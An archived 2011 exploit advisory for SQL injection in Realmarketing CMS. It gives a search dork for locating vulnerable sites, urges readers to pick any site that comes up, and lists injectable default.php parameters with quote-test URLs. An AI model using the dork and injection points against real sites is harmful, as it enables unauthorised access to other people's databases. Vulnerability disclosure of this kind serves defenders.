Realmarketing CMS Multiple SQL Injection Vulnerabilities

2011-04-22 16:15:05

#(+)Exploit Title: Realmarketing CMS System Sensitive Database Disclosure Vulnerability
#(+)Author : ^Xecuti0n3r
#(+) Date : 22.04.2011
#(+) Hour : 13:37 PM
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) dork : intext:realweb.de inurl:default.php
#(+) Category : Web Apps [SQli]

____________________________________________________________________
____________________________________________________________________

Choose any site that comes up when you enter the dork intext:"intext:realweb.de inurl:default.php" in search engine


*SQL injection Vulnerability*

# [+]http://site.com/default.php?id='125
# [+]http://site.com/default.php?id=[SQLI]
# [+]http://site.com/default.php?content='2485
# [+]http://site.com/default.php?content=[SQLI]
# [+]http://site.com/default.php?portalID='68
# [+]http://site.com/default.php?portalID=[SQLI]
# [+]http://site.com/default.php?&id='121
# [+]http://site.com/default.php?&id=[SQLI]
____________________________________________________________________
____________________________________________________________________

########################################################################
(+)Exploit Coded by: ^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.